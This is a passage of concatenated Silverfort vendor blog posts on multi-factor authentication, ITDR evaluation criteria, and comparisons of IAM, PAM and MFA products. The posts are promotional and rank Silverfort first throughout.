requires more than just a password. Over 80% of breaches are caused by weak or compromised passwords, emphasizing the need for stronger, layered defenses. Using multi-factor authentication (MFA) is the most effective method of securing user accounts, blocking 99. 9% of attacks and enhancing an organization's cybersecurity strategy significantly. Let us dive deeper into how MFA works, its vital role in cybersecurity, and essential implementation strategies for securing your enterprise.   Defining Multi-Factor Authentication   With Multi-Factor Authentication (MFA), multiple verification factors are required from users, thereby introducing a more secure authentication process, which is both more complex and more effective than Single-Factor Authentication (SFA) and Two-Factor Authentication (2FA). MFA strengthens access by requiring "something you know" (e. g. , a password), "something you have" (e. g. , a mobile device or token), and "something you are" (e. g. , biometric data).   Why MFA is Vital for Cybersecurity  Relying on passwords alone is no longer viable as they fall prey to brute-force attacks, phishing, and credential stuffing. MFA prevents such attacks by enforcing a second and even third layer of verification, deterring unauthorized access. It is an ideal solution that elevates security while aligning with industry regulations and compliance standards essential for long-term data integrity.   Key Benefits of MFA:  Enhanced Security: Layered authentication reduces the risk of unauthorized access and data breaches. Mitigation of Common Threats: Phishing, credential theft, and lateral movement attacks are effectively thwarted by MFA’s stringent identity checks. Types of Authentication Factors in MFA  Knowledge Factors: Information only the user knows, like passwords or security answers. While familiar, these can be vulnerable to phishing and require added security. Possession Factors: Physical items like a smartphone, hardware token, or smart card provide strong verification and resist remote compromise. Inherence Factors: Unique to the user, biometrics such as fingerprints or facial recognition offer a highly secure, convenient method, though privacy concerns can arise without proper safeguards. Best Practices for Implementing MFA in Your Organization  Securing your enterprise with MFA requires a strategic approach that considers operational compatibility, user experience, and comprehensive resource protection.   1. Evaluate Security Requirements  Assess which systems and accounts require protection and identify any vulnerable entry points. Consider future scaling requirements and ensure any MFA solution can support anticipated growth. 2. Select Suitable Authentication Factors  Balance security needs with user convenience, leveraging a mix of possession, knowledge, and inherent factors to optimize verification across resources. 3. Compare MFA Solutions for Compatibility  Evaluate different MFA solutions for their compatibility with existing IT infrastructure and prioritize options that offer broad integration with on-premises, cloud, and hybrid environments. 4. Develop a Comprehensive Deployment Plan  Implement MFA incrementally to ensure smooth adoption, while maintaining continuous monitoring to detect and address any potential configuration gaps. 5. User Education and Training  Training employees is essential; effective MFA adoption requires awareness of the security importance and step-by-step guidance on usage. 6. Continuous Monitoring and Incident Response  Cyber threats evolve; so should your MFA. Continuous monitoring and adaptive policies help maintain security. Regular audits ensure compliance with industry regulations and provide documentation for updates. Addressing MFA Implementation Challenges  While MFA is a powerful tool, challenges can arise:  User Inconvenience: Too complex an MFA process may lead to resistance. Educate users on MFA’s value and implement usability-optimized solutions. Technical Interoperability: Certain access interfaces, especially in legacy systems, may lack MFA support. Silverfort’s unified identity protection addresses these gaps, offering agentless, proxyless integration across diverse systems. MFA as an Industry Standard  In sectors from finance to healthcare, MFA is not just a recommendation but a regulatory necessity. Compliance with standards like CJIS, NYDFS, HIPAA, NIST, and GDPR mandates robust identity protection across systems, ensuring data integrity and reducing liabilities associated with data breaches.   Silverfort’s adaptive MFA solution stands as a robust answer to these requirements, providing seamless MFA across both modern and legacy applications, including those previously considered “unprotectable. ” Its agentless design uniquely ensures full coverage with minimal operational burden, maximizing security without disrupting workflows.   The Future of Cybersecurity is MFA-Protected  As cyber threats become more sophisticated, MFA’s role will become essential. MFA implementation offers invaluable protection, fortifying sensitive data against unauthorized access and fulfilling compliance requirements. For organizations ready to elevate their cybersecurity, embracing a solution like Silverfort’s agentless, adaptive MFA is the next logical step.   Empower your organization with comprehensive MFA protection – contact us to explore how our unified identity protection platform can secure every facet of your environment.   --- - Published: 2024-05-29 - Modified: 2024-10-02 - URL: https://www.silverfort.com/blog/top-5-evaluation-criteria-for-choosing-the-right-itdr-tool/ Identity is now a top priority for security decision makers. The need to overcome malicious TTPs, such as credential access, privilege escalation and lateral movement, has never been more urgent. When over 80% of breaches involve the use of compromised credentials and ransomware attacks take down even the largest organizations, the price of neglecting identity security is unaffordable. This state of affairs has led to the rise of a product category purpose-built for the protection of the identity attack surface: Identity Threat Detection and Response (ITDR). However, the introduction of a new category inevitably entails a period of confusion for buyers, during which identity security teams must figure out which ITDR capabilities are mandatory and which are a “nice to have”. This article assists organizations in this journey by providing the top five evaluation criteria to assess how well an ITDR solution can deliver on its promises. Evaluation criteria #1: The breadth and depth of coverage The identity attack surface is extremely heterogeneous and comprises multiple components. We can classify these to the following groups: Resources The on-prem environment includes workstations and servers, IT infrastructure, databases, and legacy apps. Some virtual machines are managed in data center servers, while IaaS virtual machines reside in the public cloud. These are joined by the corporate SaaS and web apps for storage, email and other purposes. Protocols and access methods Active Directory uses protocols such as NTLM, Kerberos, and LDAP to manage access to servers, workstations, and other on-prem resources. This access is carried out in various ways – command line, RDP, and dedicated remote access tools (Teamviewer and others like it). VPN remote access is usually done via a RADIUS, while federation servers and cloud IdPs employ SAML, OpenID, and OAuthor to access SaaS apps via users’ web browsers. User accounts Additionally, there are various types of users: standard, privileged, human and non-human. Some are easier to detect and monitor while others are more challenging. A prominent example is Non-Human Identities (NHI) such as service accounts in Active Directory environments, which are extremely hard to locate and map. An ITDR solution must be able to apply its capabilities on all users, resources, and access methods in the hybrid environment. Why does it matter? To truly protect an attack surface you must protect all of it without any blind spots. Protecting only a part of it simply leaves the path clear for adversaries to target the unprotected portion instead. That’s why, for example, lateral movement and ransomware propagation are carried out mostly via command line access (such as PsExec, PowerShell, and WMI tools) rather than with RDP. While the latter is usually protected with MFA, the former doesn’t support it. Securing a single access method to a server is not sufficient protection when there are other unsecured access points. Evaluation criteria #2: As near real time as possible ITDR solutions analyze user authentications and access attempts to disclose potential threats. Real-time analysis provides the ITDR with visibility into each authentication from the initiation and verification stages to actual completion and access. The alternative is to analyze the authentication log after the access attempt is approved or denied. Why does it matter?   The purpose of ITDR is to detect suspected malicious activity. The closer this analysis is to the real-time authentication event, the higher its chances of detecting malicious access before it can mature into an actual threat. Additionally, there are various anomalies that can be detected only during the actual authentication; these would be a blind spot for ITDR solutions that rely on retroactive log analysis. Evaluation criteria #3: Multi-layered detection engine Detecting malicious activity relies on spotting anomalies that deviate from standard legitimate behavior. However, this is not a zero-sum game and while some anomalies are clearly associated with malicious activity, most can occur for other unrelated reasons. Using a risk engine that is capable of detecting different types of anomalies can increase accuracy and reduce the risk of false positives. The anomalies an ITDR should typically look for include: Protocol anomalies These anomalies result from attack techniques that exploit weaknesses in authentication protocols to gain malicious access – pass the ticket, pass the hash, etc. These are called protocol anomalies because they involve an alteration of the authentication process. Behavior anomalies These anomalies occur as a result of lateral movement activity. Lateral movement is by nature an opportunistic activity in which the adversary hops from machine to machine in search of any stored users and machines that could help them reach their target. For example, an attacker that has landed on the patient-zero machine would use it as a starting point to access others one by one, searching for stored admin credentials or the computer name of a critical server. This type of search and movement varies greatly from standard legitimate user access. User anomalies Every user has its own baseline of resource access. This is especially true for non-human identities like AD service accounts, but applies to most human users as well. Excluding helpdesk and IT admins who need access to multiple machines for troubleshooting, most users have a defined set of resources they access in their working routine. Once an adversary compromises a user account to perform lateral movement, there’s a high chance they’ll attempt to access resources that this user has never accessed before. Why does it matter?   While each anomaly by itself entails a percentage of false positives, the intersection between them is significantly more reliable. Here’s an example:  The user Bob accesses a resource he had never accessed before. Does that mean that Bob is compromised? Not necessarily. These types of naïve anomalies also occur within the legitimate activity of every user. Let’s now assume that the authentication Bob has performed to access this resource used a weaker encryption algorithm than expected. While suspicious, this is also not necessarily malicious. However, if both anomalies occur in same access attempt, the probability that it is malicious rises significantly. Evaluation criteria #4: Ability to trigger real-time identity security controls Identity security is carried out with dedicated controls to prevent malicious access, such as access block, MFA and just-in-time access. The core role of the ITDR is to detect whether an access attempt is malicious. However, it’s essential that the ITDR also has the required integrations to trigger real-time identity security controls. The most critical ones are MFA and access block. Why does it matter?   Alerts require manual triage and investigations, and as a rule of thumb, resolving all of them is beyond the capacity of the SecOps team. An ITDR that’s capable of using its detection signals to trigger MFA and block access can provide automated real-time protection and block malicious activity rather than just alerting its presence. Evaluation criteria #5: Seamless integration with the security stack While ITDR owns the identity aspect of cyber attacks, this only a part – albeit a significant one – of the whole threat protection story. To offer comprehensive protection, an ITDR solution should be able to exchange data and risk signals with the other key components of the security stack. For example, the EDR/XDR should be able to provide the ITDR with data on suspicious processes and files, and the firewall or ZTNA on open ports and traffic origin/destination. Also, the ITDR should be able to share data with the SIEM solution to add identity security signals to the full context of network and file activity, as well as take place in automated SOAR workflows.   Why does it matter?   Increases accuracy Every security solution has a type of activity it can monitor and analyze and others that it’s blind to. For example, in the same way endpoint protection solutions are blind to the authentication process, the ITDR is blind to running processes and executing files. Intersecting the two perspectives increases accuracy and efficiency. Better operability SecOps teams employ a multitude of security tools. However, there’s usually a component – SIEM or XDR – that operates as the main interface from which alerts are managed. The ITDR must be able to seamlessly fit into the workflows of this interface to deliver its security value. ITDR is a key factor in reducing the probability and impact of identity threats The purpose of ITDR is to reduce the probability and impact of a successful identity-related attack. The criteria discussed in this article are singled out based on their contribution to this cause. Have you already shortlisted some ITDR solutions? Use these criteria to ask the hard questions. The answers will let you know if the solution you’re looking at can reduce your identity risk and provide the resilience you’re looking for. --- - Published: 2024-05-27 - Modified: 2024-11-27 - URL: https://www.silverfort.com/blog/top-okta-alternatives/ Okta has established itself as a leader in Identity and Access Management (IAM), providing powerful user authentication and authorization across many industries. However, Okta may not always be the best choice for smaller organizations or organizations seeking a flexible, cost-effective security solution. Today's IAM market is filled with a variety of options, each with distinct capabilities tailored to meet the demands of a variety of businesses. To ensure that these IAM solutions align with your organization's specific goals, budget, and cybersecurity policy, it is essential to evaluate these solutions before making a final decision.   Key Criteria for Selecting an Okta Alternative in 2025  With 80% of breaches linked to compromised identities, organizations need IAM solutions that provide seamless access control and resilient user verification. Let us examine the critical factors to consider when selecting an IAM provider in today’s complex security landscape.   Essential Features to Evaluate  User Authentication: IAM solutions should simplify user verification with security controls such as Multi-Factor Authentication (MFA), biometrics, and password protection, ensuring that only verified users gain access. User Authorization: Strong authorization solutions allow administrators to assign permissions precisely, granting privileged access only to authorized individuals and limiting exposure to sensitive resources. Single Sign-On (SSO): By enabling users to access multiple applications with a single credential set, SSO mitigates password fatigue and enhances endpoint visibility and monitoring. Zero Trust Architecture: Built on the principle of “never trust, always verify,” Zero Trust adds layers of control, minimizing lateral movement and enforcing strict access validation. Role-Based Access Control (RBAC): This feature simplifies access management by assigning permissions based on user roles, ensuring everyone has the correct access level to do their jobs securely. Audit and Reporting: Maintaining audit trails is essential for tracking activities and detecting anomalies. Effective IAM solutions offer comprehensive reporting to support compliance and enhance transparency. Cost Considerations  Budget Suitability: Assess total costs, including licensing, deployment, maintenance, and scalability to ensure they align with your organization’s budget. Flexible Pricing Models: Seek IAM providers that offer customizable and transparent pricing structures to support your financial planning and scalability goals. Usability and Integration Capabilities  User-Friendly Interface: A well-designed IAM solution should be intuitive, with a streamlined interface that simplifies deployment and maintenance for all users. Compatibility with Existing Infrastructure: Your IAM solution should seamlessly integrate with current IT systems, cloud environments, and directories to support a cohesive resource management experience. Customer Support and Resources  Reliability of Customer Support: Quick, accessible support is crucial, especially during security incidents. Evaluate provider response times, support channels, and community resources. Top Okta Alternatives for IAM in 2025  1. Silverfort  Pros: Silverfort offers a comprehensive identity security solution that extends across on-premises, cloud, and hybrid environments. Its robust MFA, Identity Threat Detection and Response (ITDR), SSO capabilities, and adaptive deny policies provide complete visibility and control over user activity.   Cons: While not a traditional IAM solution, it integrates with every IAM platform. Pricing: Contact Silverfort for tailored pricing information.   Best for: Organizations seeking a unified solution to enforce security across cloud and on-premises systems seamlessly.   2. Jump Cloud  Pros: As a cloud-native solution, Jump Cloud offers extensive device authentication and configuration policies for secure identity management.   Cons: Limited SSO capabilities and requires complex configurations.   Pricing: Starts at $13 per user per month, with annual billing; additional user lifecycle management at $11 per user per month.   Best for: Companies prioritizing a cloud-native approach to IAM, especially in tech or educational sectors.   3. CyberArk Identity Security  Pros: Known for its intuitive interface and privileged access management, CyberArk offers MFA and self-hosting options that integrate easily with other security solutions.   Cons: Limited reporting features and less comprehensive documentation.   Pricing: Tiered subscriptions available upon request, including a 30-day free trial.   Best for: Large enterprises requiring robust access controls and data security management.   4. OneLogin  Pros: Delivers adaptive MFA and customizable options within an intuitive interface.   Cons: Requires reliable internet access and may experience unexpected logouts.   Pricing: Starts at $2 per user per month for SSO, with minimum users required. Advanced MFA features start at $4 per user per month.   Best for: Medium-to-large organizations with moderate security requirements.   5. Ping Identity  Pros: Offers flexible MFA across devices and environments, supporting on-premises, cloud, and hybrid configurations.   Cons: Primarily tailored for larger enterprises; limited offline functionality and reliance on internet connectivity for notifications.   Pricing: Begins at $20,000 annually; 30-day trial available.   Best for: Large enterprises with scaling needs and complex infrastructure requirements.   6. Oracle Identity Cloud Service  Pros: Oracle’s cloud IAM solution is user-friendly, automates access management, and simplifies deployment.   Cons: Customization is complex, and the service may be cost-prohibitive for smaller businesses.   Pricing: Quotation-based plans billed monthly based on user activity.   Best for: Large organizations with high data security requirements and a budget to match.   7. Cisco Duo Security  Pros: Cloud-based IAM platform with reliable MFA and seamless authentication processes.   Cons: Notification delays and configuration limitations for advanced access control.   Pricing: Subscription-based, starting at $3 per user per month; a free plan is available.   Best for: Enterprises requiring centralized IAM solutions with flexible pricing.   8. Microsoft Entra (formerly Azure AD)  Pros: Offers a comprehensive ecosystem that supports hybrid environments, allowing organizations to manage on-premises and cloud resources efficiently.   Cons: The platform may involve a steeper learning curve for organizations not already invested in the Microsoft ecosystem, and its advanced features can require additional licenses.   Pricing: Free and tiered paid plans start at $6 per user per month, with advanced security and governance features available in the Premium P2 plan at $9 per user per month.   Best for: Enterprises deeply integrated with Microsoft products and those seeking a unified identity management solution with strong hybrid and cloud capabilities.   Best Okta Alternatives: Making Your Final Decision  Selecting the right IAM solution hinges on your organization’s unique needs. While traditional or high-cost IAM tools may be impractical for small-to-medium enterprises, larger organizations face risks if they adopt tools that lack essential security features. By following the criteria outlined here and conducting an internal assessment of your needs and budget, you will be well-equipped to make an informed choice.   Looking for an IAM solution that scales with your environment? Explore Silverfort’s unified identity security platform to see how it can fortify your access control and user verification. Book a demo today to learn more!   --- - Published: 2024-05-27 - Modified: 2024-11-27 - URL: https://www.silverfort.com/blog/leading-alternatives-to-cyberark/ Privileged Access Management (PAM) is essential in cybersecurity, especially given that 74% of breaches involve unauthorized access to privileged accounts. Securing these accounts is critical to prevent brute-force attacks, password compromises, and compliance violations. CyberArk has long been a frontrunner in PAM, offering key features like threat detection and password vaulting. Yet, as cyber threats evolve, it’s crucial to assess innovative alternatives to CyberArk that offer advanced, adaptive PAM capabilities.   This guide provides an in-depth comparison of top CyberArk alternatives, detailing the capabilities each solution brings to modern PAM challenges.   Choosing the Optimal CyberArk Alternative  In selecting a CyberArk alternative, it’s vital to evaluate features addressing core PAM needs, such as account discovery, password management, session monitoring, compliance, and multi-factor authentication (MFA). Below are the primary criteria and top alternatives:  Key PAM Features to Consider  Account Discovery - Essential for identifying privileged accounts across IT infrastructure and bringing them under PAM oversight. Password Vaulting - Central to PAM, ensuring secure storage of credentials with strict access controls. Session Monitoring - Provides real-time insights into privileged account usage, enabling immediate responses to suspicious activity. Reporting and Compliance - Facilitates detailed reporting and auditing, aiding in compliance and risk management. Adaptive MFA - Enhances security by dynamically enforcing authentication requirements based on access risk. Principle of Least Privilege - Restricts account access to only essential privileges, reducing potential exposure to malicious actors. Top CyberArk Alternatives for PAM 1. Silverfort Pros: Silverfort automatically detects and classifies all privileged users and can apply Just-In-Time (JIT) policies across all users. Silverfort enforces real-time access control and MFA, offering seamless integration across legacy, hybrid, and cloud ecosystems. Cons: Requires IT resources for deployment. Best For: Organizations seeking a scalable, automated solution that supports quick deployment. Pricing: Contact Silverfort for details. 2. HashiCorp Vault  Pros: Delivers cloud-native secret management, securing passwords, tokens, and encryption keys. Credentials are securely managed and destroyed post-session. Cons: Requires the Boundary solution to fully enable PAM capabilities. Lacks in-depth compliance reporting. Best For: Large organizations with complex infrastructures needing cloud-native secrets management. Pricing: Free for up to 25 secrets; paid plans start at $1. 58/hour for dedicated hosting. 3. JumpCloud  Pros: Cloud-based PAM offering centralized management, incorporating MFA, SSO, and session monitoring. Cons: Limited feature set, complex user interface, and lacks a fully cloud-native password manager. Best For: Small to mid-sized businesses seeking cloud-based identity management. Pricing: Free for up to 10 users/devices; paid plans from $3/user per month. 4. BeyondTrust  Pros: Supports least-privilege enforcement, robust auditing, and incident response. Cons: High licensing costs, and the interface can be cumbersome. Best For: Enterprises with remote workforces needing versatile PAM features. Pricing: Typically starts around $75,000/year. 5. Delinea  Pros: Manages both on-premises and cloud access, with secure SSH and RDP support and detailed reporting. Cons: Limited third-party integrations and primarily Windows-focused. Best For: Enterprises needing centralized access management. Pricing: Quote-based. 6. One Identity Safeguard  Pros: Offers session recording, vaulting, and single-account access management. Cons: Integration limitations and complex interface. Best For: Large organizations needing comprehensive access control. Pricing: Request via website. 7. Okta Advanced Server Access (ASA)  Pros: Cloud-native PAM for hybrid setups, integrates smoothly with existing tools. Cons: Lacks RDP auditing and can be costly with a complex setup. Best For: Cloud-centric organizations. Pricing: $14/resource/month, with additional costs for advanced features. Selecting the Right CyberArk Alternative  By selecting a PAM solution tailored to your unique security landscape, you can strengthen privileged access protection, support compliance, and detect real-time threats. Each solution presents distinct strengths: from Silverfort’s unified identity protection to HashiCorp’s robust secrets management, enabling organizations to fortify PAM according to their operational needs.   Silverfort offers a comprehensive approach to PAM, combining adaptive MFA, automated account discovery, and in-depth monitoring to secure critical systems and meet modern security standards. Schedule a demo today to learn how Silverfort can help secure your organization’s privileged access in a scalable, adaptive, and streamlined manner.   --- - Published: 2024-05-27 - Modified: 2024-11-27 - URL: https://www.silverfort.com/blog/duo-alternatives/ Every organization requires a different approach to Multi-Factor Authentication (MFA). Depending on the size, complexity, and sensitivity of an organization's data, the requirements of an MFA solution can vary significantly. To provide the necessary level of cybersecurity protection, a tailored approach to MFA is often necessary. Among the leading players in the MFA market, Cisco Duo has long offered a cloud-based access management solution and features like auditing and reporting. However, limitations such as MFA timeouts, delayed push notifications, and inconsistent customer support highlight the need for more sophisticated alternatives. Many modern MFA solutions surpass Duo's capabilities, offering stronger security features and more customization. Below, we examine some of the best alternatives for securing user identification, access control, and organizational authentication.   Key Criteria for Selecting a Duo Alternative  Before diving into the specifics of available MFA options, consider the essential criteria any potential MFA solution must meet to ensure robust security for your organization:  User Experience and Customer Support: A streamlined user interface and strong customer support are essential. Ease of deployment and navigation ensures smooth operations and minimizes friction while enhancing security posture. Offline MFA Support: Security does not stop when your systems are offline. Your MFA solution should extend to offline methods such as hardware tokens or biometrics, enabling seamless authentication even without internet access. Multiple Authentication Options: The MFA tool should support a broad range of authentication methods, from tokens and push notifications to biometric factors. The more versatile, the better equipped your organization will be to face emerging threats. Adaptive Authentication: Modern threats are dynamic, and your MFA solution should be too. Look for adaptive MFA features that adjust based on real-time risk, offering stronger security while maintaining user convenience. Integration and Scalability: MFA solutions must integrate smoothly with your current infrastructure—whether it is cloud, on-prem, or hybrid. The ability to scale your business and adapt to changing security needs is crucial. Reporting and Auditing: Visibility is critical for security. A good MFA system will offer detailed auditing and reporting capabilities to monitor access patterns, compliance adherence, and identify potential risks in real-time. Top Alternatives to Cisco Duo  Here are some of the best alternatives to Cisco Duo, offering advanced capabilities to strengthen your organization’s identity protection efforts:  1. Silverfort MFA  Pros: Silverfort’s agentless and proxyless approach integrates with any existing identity infrastructure, including legacy systems, command-line tools, and on-premises resources. Its AI-driven risk engine adapts authentication requirements in real-time, covering resources that traditional MFA solutions often miss. Cons: Some organizations may require multiple layers of security to ensure proper verification and authentication. Best for: Enterprises needing comprehensive protection, especially those with complex hybrid environments that include legacy applications. 2. Microsoft Entra ID (Azure Active Directory)  Pros: Offers robust SSO, real-time visibility, and identity protection features. It is a great option for cloud-first environments. Cons: Higher costs and occasional outages can be a drawback. The interface is also complex for some users. Best for: Organizations fully transitioning to cloud environments or scaling up existing security infrastructures. 3. Okta MFA  Pros: A cloud-native identity and access management tool, Okta offers deep auditing features and integrates well with other tools, enhancing your security infrastructure. Cons: Push notifications and logins can experience delays, and legacy systems need external syncing. Best for: Organizations are just beginning to build out their identity and security infrastructure. 4. ManageEngine ADSelfService Plus  Pros: Specializes in password management and identity security. It includes self-service tools for password resets and account unlocking, enhancing security for both endpoints and cloud apps. Cons: Key features are locked behind premium plans, making it pricey. Additionally, integration with hybrid environments can be slow. Best for: Larger organizations with dedicated IT budgets, especially in finance or IT sectors. 5. Thales SafeNet Authentication Service (SAS)  Pros: A cloud-based solution with flexible access management and strong monitoring capabilities. It provides a wide range of authentication tools for securing user identities. Cons: Requires additional software for full integration with on-prem environments. Many features are outdated, with no recent updates. Best for: Enterprises needing secure SSO and user access management for cloud applications. 6. IBM Security Verify  Pros: This robust IAM solution supports MFA for web apps, mobile devices, and desktop environments. Cons: Its deployment process can be complex, and limited reporting may be a challenge for detailed audits. Best for: Large enterprises with significant on-prem and cloud resources transitioning to comprehensive IAM solutions. 7. SecureAuth Arculix  Pros: A flexible, password less MFA platform with AI-driven risk analysis, it offers extensive policy customization. Cons: Remote MFA enrollment can be difficult, and the mobile experience is not always smooth. Best for: SMBs and enterprises seeking a flexible solution with self-service capabilities. SOLUTION PROS CONS PRICING BEST FOR Silverfort Comprehensive adaptive MFA. Integrates with all MFA/IAM tools. Real-time coverage with robust reporting. Automated account discovery and protection. Might require extra steps to secure access and verify users.  Contact Silverfort for detailed pricing.  Organizations seeking high-grade protection, especially for cloud and legacy systems, with robust auditing and automation. Microsoft Entra ID Great for cloud-centric environments. Offers real-time visibility and SSO. Identity protection tools. More expensive than other MFA solutions. Reported outages. Complex to use and navigate. Several plans available. Microsoft Entra ID P1 starts from $6 per user/ month. ID P2 costs $9 per user/ month. Microsoft Entra Suite starts from $12. 00 per user/month. Organizations are looking to entirely transition to the cloud or support their existing tools. Okta MFA Configurable MFA and SSO add-ons. Robust auditing. Integrates with other tools. On-prem and legacy MFA require syncing with other software. Frequent time lags with push notifications and logins. Their MFA plan starts at $3 per user/ month. Businesses are just starting to set up their security infrastructures.  ManageEngine ADSelfService Plus Robust password management. Self-service options. Secure endpoint and cloud logins. Expensive premium plans, featuring key MFA tools. Complex integration. Limited customization. Annual subscriptions, from $195 for standard MFA (100 domain users). Larger businesses with a robust budget, especially those in IT and finance.  Thales Safenet Authentication Service (SAS) Great for cloud-based environments. Strong reporting and monitoring. Flexible access management. Requires additional software to fully operate in on-prem and hybrid systems. Pricey features sold separately. No new features added. Custom pricing quotes.  Organizations seeking integrated SSO with secure user access in cloud and web-based apps. IMB Security Verify Solid MFA for web apps, desktop, and mobile.  Works with cloud and on-premise systems.  Configurable risk-level settings.  Insufficient troubleshooting documentation. Deployment is long and complex. Limited reporting options. Based on usage and features. E. g. , Adaptive MFA for 1,000 users is $3. 75 per user/ month. Enterprises that are slowly transitioning to cloud IAM. SecureAuth Arculix Password less MFA. Easy policy creation. Machine learning for assigning risk scores. Frustrating mobile experience.  Delayed customer support.  Complex MFA enrollment remotely. Undisclosed. Reach out via their website for details.  SMBs and enterprises seeking flexible MFA with good self-service.   Conclusion: Selecting the Right Duo Alternative  When evaluating alternatives to Cisco Duo, the goal is not just to replace one tool with another—it is about finding a solution that fits your unique needs, enhances your cybersecurity efforts, and scales with your organization. Silverfort, with its comprehensive adaptive MFA, covers all bases by protecting legacy systems, offline devices, and cloud applications alike. It is a clear leader for organizations seeking an all-in-one solution to elevate their security posture.   To explore how Silverfort can protect your entire organization, schedule a demo today!   --- - Published: 2024-05-27 - Modified: 2024-11-27 - URL: https://www.silverfort.com/blog/top-multi-factor-authentication-mfa-solutions/ In cybersecurity, the best defense is often layered. As attackers get smarter, so must our defenses, and no security measure is as foundational today as Multi-Factor Authentication (MFA). MFA protects your organization by requiring users to verify their identities with multiple forms of credentials, making unauthorized access significantly more difficult. Below, we outline essential MFA features, the top solutions on the market, and key considerations to help you choose the best tool for your security needs in 2025.   Understanding Multi-Factor Authentication (MFA)  MFA is a security method that enhances login security by requiring more than one verification factor by the user trying to gain access to a specific resource. In practice, MFA could require:  Something the user knows – like a password or PIN. Something the user possesses – such as a hardware token, smartphone, or security key. Something the user is – biometrics like fingerprints, voice recognition, or facial scans. Each verification layer adds an extra hurdle for attackers, ensuring only authorized users gain access.   Core Benefits of Implementing MFA  In today’s threat landscape, 83% of businesses rely on MFA to achieve:  Enhanced Security: MFA provides protection against phishing, password breaches, and data theft by requiring multiple forms of verification. Compliance Alignment: Many regulatory standards, including NIST, NYDFS, CIJS, NIS2, HIPAA and GDPR, mandate MFA as a necessary security measure to protect sensitive data. Password Security: MFA mitigates risks associated with weak or reused passwords, adding a secondary barrier even if passwords are compromised. Flexibility and Adaptability: Adaptive MFA responds dynamically to risk factors such as user location and device type, enhancing security without impacting user experience. Key Features to Consider in an MFA Solution  With so many MFA tools available, focus on the following critical features to identify a solution that meets your organization’s unique security requirements.   1. Comprehensive Security  MFA should support a range of authentication factors, including biometric data, hardware tokens, one-time passwords (OTPs), and Single Sign-On (SSO). The ability to integrate seamlessly across both cloud and on-prem environments is crucial. 2. User-Friendly Experience  Complexity in MFA workflows can lead to skipped steps and increased security risks. Choose a solution that balances robust security with ease of use, such as offering quick and flexible login options, self-service password recovery, and minimal login friction. 3. Diverse Deployment Options  Look for MFA solutions that support both cloud and on-premises deployments to cover your entire infrastructure. Consider agent-based options, which are customizable but require software installation, or agentless MFA, which minimizes maintenance through cloud-based management. 4. Seamless Integration  An ideal MFA tool will integrate with your current IT stack, supporting applications, VPNs, directories, and any additional identification tools like password managers, providing consistent security coverage across your ecosystem. 5. Compliance Support  Compliance is critical for data protection. Opt for an MFA solution that helps meet industry standards like PCI DSS, ISO/IEC 27001, and HIPAA, which will allow you to monitor and document compliance efforts effectively. Top MFA Solutions for 2025  With these key features in mind, here are some of the top MFA solutions to consider as we head into 2025:  1. Silverfort  Silverfort’s agentless MFA technology is designed for modern enterprises, providing seamless, real-time protection for on-premises and cloud environments without endpoint agents.    It is a versatile solution, compatible with legacy applications, operational technology (OT) systems, and command-line tools that often support traditional MFA protection. Silverfort integrates with other major MFA providers (e. g. , Microsoft, Ping, Duo) to elevate security across all resources, making it ideal for complex IT environments.   Key Features: Identity Threat Detection and Response (ITDR), AI-driven and adaptive authentication, risk-based policies. Pros: Excellent compliance support, robust real-time monitoring and auditing, agentless deployment. Cons: Limited support for Linux workloads. 2. Cisco Duo  Cisco Duo provides a cloud-based MFA that supports passwordless access and single sign-on (SSO) for consistent, multi-layered security across all devices. Duo’s dedicated mobile app simplifies user authentication and offers clear visibility of device status and security threats, making it a strong choice for remote and hybrid work environments.   Key Features: Passwordless login, risk-based authentication, SSO. Pros: Comprehensive device visibility, smooth integration with other tools, proactive phishing protection. Cons: On-premises performance can lag, limited email authentication options. 3. Ping Identity  Ping Identity offers an MFA solution built for hybrid and multi-cloud environments, enabling secure access across devices with single sign-on and robust user management features. While it provides extensive cloud deployment options, its interface can be complex, and it lacks clear documentation for compliance requirements.   Key Features: Risk-based policies, MFA-enabled mobile app, support for remote access. Pros: Versatile cloud and on-premises support, passwordless options. Cons: Slow MFA notifications, complex user interface. 4. Okta Adaptive MFA  Okta Adaptive MFA is a flexible, cloud-based MFA solution within the larger Okta ecosystem, supporting a wide range of integrations and user profiles. The platform’s Quickstarts and SDKs enable simplified deployment, and it offers an intuitive, user-friendly experience with social login support and SSO capabilities.   Key Features: Passwordless logins, Okta ThreatInsight, Okta FastPass. Pros: Strong phishing protection, user-friendly app, easy integration. Cons: Complex password management, high price point aimed at enterprise clients. 5. Microsoft Entra ID (formerly Azure AD)  Microsoft Entra ID offers a robust suite of MFA options, including SMS, app-based verification, and security keys. It integrates seamlessly with Microsoft 365 and numerous SaaS platforms, providing a cohesive security experience for organizations already in the Microsoft ecosystem.   Key Features: SSO, biometrics, push notifications. Pros: User-friendly, supports identity management, extensive integration. Cons: Complex on-premises deployment, frequent Microsoft updates can disrupt performance. 6. WatchGuard Auth Point  WatchGuard Auth Point secures access with unique device DNA signatures, enhancing verification by identifying authorized devices and blocking unauthorized ones. The tool is ideal for cloud-based MFA and includes options for VPN protection, making it a good fit for mobile and remote users.   Key Features: Device DNA, hardware tokens, mobile push. Pros: Reliable VPN protection, straightforward cloud deployment. Cons: Complex setup for on-premises deployments, notifications can be inconsistent. 7. RSA SecurID  RSA SecurID provides robust identity and access management solutions across enterprise and mid-sized businesses. Supporting multiple authentication types (biometrics, SMS, push notifications), RSA SecurID offers flexibility and risk-based policies, with integration options for third-party apps.   Key Features: Identity assurance, time-based authentication, administrative control. Pros: User-friendly, strong VPN integration, clear setup. Cons: More complex for cloud use, lacks temporary code options for new devices. Overcoming Common MFA Challenges  Implementing MFA can come with certain challenges, including phishing risks, device loss, and compatibility issues. To mitigate these:  Use Phishing-Resistant Methods: Consider hardware tokens and biometrics, which are less vulnerable to phishing. Encryption and Secure Channels: Protect communication with app-based authentication over encrypted channels. Adaptive Policies: Avoid authentication fatigue by using adaptive MFA, which customizes the number of prompts based on risk. Prepare for Lost Devices: Support backup codes and remote management to help users quickly regain secure access if a device is lost. Choosing the Right MFA Solution for Your Organization  The ideal MFA solution will align with your organization’s size, security needs, budget, and anticipated growth. Choosing the right tool can streamline access management, secure data, and simplify compliance.    For organizations looking to elevate their security posture, Silverfort’s Unified Identity Protection offers unparalleled versatility, integrating effortlessly across cloud and on-premises environments while providing real-time identity threat protection.   See the difference with Silverfort — schedule a demo today!   --- - Published: 2024-05-23 - Modified: 2024-06-04 - URL: https://www.silverfort.com/blog/how-silverfort-helps-law-enforcement-comply-with-advanced-authentication/ If your organization has access to sensitive data from government agencies, you will most likely have to adhere to the Criminal Justice Information Services (CJIS) compliance requirements. CJIS compliance helps prevent unauthorized access to 